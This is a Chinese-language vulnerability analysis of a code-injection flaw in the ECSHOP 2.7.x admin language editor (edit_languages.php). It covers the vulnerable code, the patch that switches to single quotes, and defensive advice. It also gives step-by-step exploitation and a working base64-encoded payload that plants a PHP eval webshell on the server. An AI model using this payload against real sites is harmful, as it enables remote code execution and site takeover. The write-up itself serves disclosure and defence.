ECSHOP \admin\edit_languages.php GETSHELL Based On Injection PHP Code Into /languages/zh_cn/user.php

1. 漏洞描述
2. 漏洞触发条件
3. 漏洞影响范围
4. 漏洞代码分析
5. 防御方法
6. 攻防思考

1. phpmyadmin使用config/config.inc.php保存phpmyadmin的配置信息：phpmyadmin setup.php代码注入漏洞
2. ecshop使用/languages/zh_cn/user.php保存网站的语言配置项：ecshop user.php php curl 代码动态执行漏洞

1. 访问网站后台
http://localhost/ecshop2.7.2/admin/

2. 左边导航栏
模板管理 -> 语言项管理 -> 选择: user.php(会员中心语言包) -> 搜索: is_paid

3. 对模板文件进行编辑
插入${${fputs(fopen(base64_decode(ZnVjay5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbZnVja10pPz4))}}

4. 访问被注入PHP代码的文件
http://localhost/ecshop2.7.2/languages/zh_cn/user.php

5. 生成WEBSHELL
http://localhost/ecshop2.7.2/languages/zh_cn/fuck.php

http://www.wooyun.org/bugs/wooyun-2010-024714

ecshop 2.7.2
最新版ecshop 2.7.3
更早版本是否存在未知
...

.....
/*------------------------------------------------------ */
//-- 编辑语言项
/*------------------------------------------------------ */
elseif ($_REQUEST[‘act‘] == ‘edit‘)
{
    /* 语言项的路径 */
    $lang_file = isset($_POST[‘file_path‘]) ? trim($_POST[‘file_path‘]) : ‘‘;

    /* 替换前的语言项 */
    $src_items = !empty($_POST[‘item‘]) ? stripslashes_deep($_POST[‘item‘]) : ‘‘;

    /* 修改过后的语言项 */
    $dst_items = array();
    $_POST[‘item_id‘] = stripslashes_deep($_POST[‘item_id‘]);

    for ($i = 0; $i < count($_POST[‘item_id‘]); $i++)
    {
        /* 语言项内容如果为空，不修改 */
        if (trim($_POST[‘item_content‘][$i]) == ‘‘)
        {
            unset($src_items[$i]);
        }
        else
        {
            $_POST[‘item_content‘][$i] = str_replace(‘\\\\n‘, ‘\\n‘, $_POST[‘item_content‘][$i]);
            /*
            这行代码是导致漏洞的关键
            将用户输入的内容用双引号("")包裹，并写入磁盘上的文件中
            这为黑客提供向磁盘文件注入"Curl Syntax Code"，并进行代码执行提供了机会
            */
            $dst_items[$i] = $_POST[‘item_id‘][$i] .‘ = ‘. ‘"‘ .$_POST[‘item_content‘][$i]. ‘";‘;
        }
    }
    ....

1. edit_languages.php属于系统的输入边界，是接收用户输入数据的地方

2. edit_languages.php没有对用户输入的数据进行有效过滤、转义，导致黑客将PHP代码注入到user.php文件中

3. 没有遵循"数据"、"代码"分离的原则，user.php本质上是用来保存数据信息的，但是却被以黑客可以随便访问的.php文件的形式保存在磁盘上。要做好数据、代码的逻辑分离，可以采用以下2种最佳安全实践
    1) 在保存数据的文件头部使用 ifundine then exit的防御代码
    2) 使用.txt文件扩展名保存这类保存数据的文件

$_LANG[‘is_paid‘] = "${${fputs(fopen(base64_decode(ZnVjay5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbZnVja10pPz4))}}";

http://www.cnblogs.com/LittleHann/p/3522990.html
//搜索：0x10: Curly Syntax

.....
/*------------------------------------------------------ */
//-- 编辑语言项
/*------------------------------------------------------ */
elseif ($_REQUEST[‘act‘] == ‘edit‘)
{
    /* 语言项的路径 */
    $lang_file = isset($_POST[‘file_path‘]) ? trim($_POST[‘file_path‘]) : ‘‘;

    /* 替换前的语言项 */
    $src_items = !empty($_POST[‘item‘]) ? stripslashes_deep($_POST[‘item‘]) : ‘‘;

    /* 修改过后的语言项 */
    $dst_items = array();
    $_POST[‘item_id‘] = stripslashes_deep($_POST[‘item_id‘]);

    for ($i = 0; $i < count($_POST[‘item_id‘]); $i++)
    {
        /* 语言项内容如果为空，不修改 */
        if (trim($_POST[‘item_content‘][$i]) == ‘‘)
        {
            unset($src_items[$i]);
        }
        else
        {
            $_POST[‘item_content‘][$i] = str_replace(‘\\\\n‘, ‘\\n‘, $_POST[‘item_content‘][$i]);
        /*
        这行是patch代码的关键，将原本的双引号("")改为了单引号(‘‘)，有效地组织了代码注入后的执行
        */
            $dst_items[$i] = $_POST[‘item_id‘][$i] .‘ = ‘. ‘\‘‘ .$_POST[‘item_content‘][$i]. ‘\‘;‘;
        }
    }
    .....

1. 文件/模版编辑类 注入漏洞的的注入的目标对象是磁盘上的静态php文件，而不是数据库
2. 文件/模版编辑类 在进行代码注入后，往往不是立即生效，而是要通过之后的访问或者被其他文件引入，才能执行被注入文件中的curl syntax代码

1. 输入过滤，将WEBSHELL PHP CODE注入的源头堵住
2. 对已经被注入的，对保存脏数据的WEBSHELL后门文件进行清理